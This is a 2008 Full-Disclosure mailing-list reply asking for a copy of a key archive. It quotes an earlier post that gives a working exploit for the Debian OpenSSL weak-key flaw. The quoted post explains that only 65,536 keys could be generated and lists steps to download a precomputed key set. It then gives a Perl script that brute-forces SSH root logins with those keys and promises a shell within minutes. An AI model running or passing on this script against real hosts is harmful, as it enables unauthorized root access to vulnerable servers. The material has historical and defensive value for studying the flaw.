[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <c12724990805180813x4fafd03aydd3278bc24e52145@mail.gmail.com>
Date: Sun, 18 May 2008 11:13:48 -0400
From: "bob harley" <bobb.harley@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Working exploit for Debian generated SSH Keys
Anyone have a copy of
rsa.2048.tar.bzip2<http://www.deadbeef.de/rsa.2048.tar.bzip2>?
The web server isn't playing nicely ;-)
On Thu, May 15, 2008 at 2:35 AM, Markus Müller <mm@...dbeef.de> wrote:
> Hi full-disclosure,
>
> the debian openssl issue leads that there are only 65.536 possible ssh
> keys generated, cause the only entropy is the pid of the process
> generating the key.
>
> This leads to that the following perl script can be used with the
> precalculated ssh keys to brute force the ssh login. It works if such a
> keys is installed on a non-patched debian or any other system manual
> configured to.
>
> On an unpatched system, which doesn't need to be debian, do the following:
>
> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>
> 2. Extract it to a directory
>
> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
> Bits, generated on an upatched debian (this is the key this exploit will
> break)
>
> 4. Run the perl script and give it the location to where you extracted
> the bzip2 mentioned.
>
> #!/usr/bin/perl
> my $keysPerConnect = 6;
> unless ($ARGV[1]) {
> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
> print "By mm@...dbeef.de\n";
> exit 0;
> }
> chdir($ARGV[0]);
> opendir(A, $ARGV[0]) || die("opendir");
> while ($_ = readdir(A)) {
> chomp;
> next unless m,^\d+$,;
> push(@a, $_);
> if (scalar(@a) > $keysPerConnect) {
> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
> ".$_ } @a)." ".$ARGV[1]);
> @a = ();
> }
> }
>
> 5. Enjoy the shell after some minutes (less than 20 minutes)
>
> Regards,
> Markus Mueller
> mm@...dbeef.de
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists